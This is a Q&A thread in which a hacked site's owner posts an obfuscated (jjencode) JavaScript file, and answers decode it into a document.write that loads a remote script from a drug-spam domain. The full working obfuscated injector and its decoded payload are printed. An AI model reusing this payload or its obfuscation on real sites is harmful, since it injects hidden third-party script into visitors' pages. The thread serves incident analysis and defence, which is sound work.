# Very interesting Javascript Obfuscation. Help understanding it

Tags: javascript, security, obfuscation, deobfuscation

I found out one of my sites was hacked, and upon investigation, I looked at a javasript file that was uploaded and I couldn't believe that it actually served a purpose due to the insane obfuscation.

I'm so intrigued with it that I need to know how the hell this even works. If anyone can provide any information that is greatly appreciated! Plus this will help me find out other hidden hacked files on my server!

Here are the contents:

```
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"=\\\\\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"-\\"+$.__$+$.$$_+$._$$+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.___+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"."+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$_$+"/\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.__$+$.$$_+$._$$+"/"+$.__+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+$.$$_$+$._$+(![]+"")[$._$_]+"/\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$$_+$.$_$$+$.$_$_+"\\"+$.__$+$.$$_+$._$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\\\\\"></\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();
```

Comment: It's just variables with annoying names, plus language behaviors like `![]`.  Try running bits of it in a console & you'll see

Comment: This question appears to be off-topic because it is like a code-golf question. "Help me solve this riddle, guys!"

Answer (score 9):

First, add some whitespace:

```
$ = ~ [];
$ = {
    ___: ++$,
    $$$$: (![] + "")[$],
    __$: ++$,
    $_$_: (![] + "")[$],
    _$_: ++$,
    $_$$: ({} + "")[$],
    $$_$: ($[$] + "")[$],
    _$$: ++$,
    $$$_: (!"" + "")[$],
    $__: ++$,
    $_$: ++$,
    $$__: ({} + "")[$],
    $$_: ++$,
    $$$: ++$,
    $___: ++$,
    $__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$]
    + ($._$ = $.$_[$.__$])
    + ($.$$ = ($.$ + "")[$.__$])
    + ((!$) + "")[$._$$]
    + ($.__ = $.$_[$.$$_])
    + ($.$ = (!"" + "")[$.__$])
    + ($._ = (!"" + "")[$._$_])
    + $.$_[$.$_$]
    + $.__
    + $._$
    + $.$;
$.$$ = $.$
    + (!"" + "")[$._$$]
    + $.__
    + $._
    + $.$
    + $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$(
    $.$$
    + "\"" + $.$$_$ + $._$ + $.$$__ + $._
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_
    + "\\" + $.__$ + $.$_$ + $.$$_ + $.__
    + ".\\" + $.__$ + $.$$_ + $.$$$
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$ + $.__ + $.$$$_
    + "(\\\"<\\" + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + "\\" + $.$__ + $.___
    + "\\" + $.__$ + $.$$_ + $._$$
    + "\\" + $.__$ + $.$$_ + $._$_ + $.$$__
    + "=\\\\\\\"\\" + $.__$ + $.$_$ + $.___ + $.__ + $.__
    + "\\" + $.__$ + $.$$_ + $.___ + "://" + $.$$_$
    + "\\" + $.__$ + $.$_$ + $.$$_
    + "\\" + $.__$ + $.$$_ + $._$$
    + "-\\" + $.__$ + $.$$_ + $._$$ + $.$$$_
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$$_ + $.$$_ + $.$$$_
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.___ + $._$
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "." + $.$$__ + $._$
    + "\\" + $.__$ + $.$_$ + $.$_$
    + "/\\" + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + "\\" + $.__$ + $.$$_ + $._$$
    + "/" + $.__
    + "\\" + $.__$ + $.$$_ + $._$_ + $.$_$_
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$_$_ + $.$$_$ + $._$ + (![] + "")[$._$_]
    + "/\\" + $.__$ + $.$$_ + $._$$ + "\\" + $.__$ + $.$_$ + $.__$ + $.$$_$ + $.$$$_ + $.$_$$ + $.$_$_
    + "\\" + $.__$ + $.$$_ + $._$_ + ".\\" + $.__$ + $.$_$ + $._$_
    + "\\" + $.__$ + $.$$_ + $._$$
    + "\\\\\\\"></\\"
    + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + ">\\\");"
    + "\""
)())();
```

**1.**
Everything but the last statement is creating the object `$` whose values are mostly  numbers and strings, like `"f"`, `8`, and `"return"`.

Of particular significance, however, is `$.$`, which is `Function`. Calling `Function(s)` creates a function whose body is `s`.

For example, `Function('return 1;')` returns `function() { return 1; }`.

Essentially, `Function(s)()` (or in this case, `$.$(s)()`) is the equivalent of `eval(s)`.

**2.**
All the string concatenations in that last statement create a string.

```
return"docu\155e\156t.\167\162\151te(\"<\163c\162\151\160t\40\163\162c=\\\"\150tt\160://d\156\163-\163e\162\166e\162\150o\155e.co\155/\163c\162\151\160t\163/t\162a\155adol/\163\151deba\162.\152\163\\\"></\163c\162\151\160t>\");\"
```

**3.**
which when evaluated with `$.$` returns as a string

```
document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");
```

**4.**
Calling `$.$` a second time on this result completes the attack.

This code is clearly intended to appear as innocuous as possible, by not using `eval`, `Function`, `function`, or any HTML entities like `<`.

The double call to `Function` that IMO are not necessary, but I suppose it further obfuscates the code.

Now, as to you final question, do you intend to be running 3rd party Javascript? If so, the only robust framework I know of for something like that is [Google Caja](https://code.google.com/p/google-caja/).

**EDIT:** This appears to be the result of [jjencode](http://utf-8.jp/public/jjencode.html) for

```
document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");
```

jjencode even has the option to return a palindromic obfuscation.

Comment: Excellent work. It does however need the first statement, as the second uses it's value (e.g. `++$`)

Comment: excellent work. are there any tools to imitate this kind of obfuscation?

Answer (score 1):

I ran it in the console - it seems to replace the website's HTML with spam links trying to sell drugs - "Generic Viagra $108" etc.

[image]

Comment: what console did you run it in? I see you using google chrome, but how do you run specific javascript in the console? save it to a page and open it in chrome??

Comment: Ctrl+Shift+J on Windows, or Cmd+Option+J on Mac. Or you can right click and choose "Inspect Element". This opens the developer tools, which includes a JavaScript console allowing you to enter JavaScript code line by line (or you can use Shift+Enter to input multiple lines of code, or you can paste in blocks of code). Be careful though, never run unknown JavaScript code while logged into a website - better to run it in private mode with cookies disabled.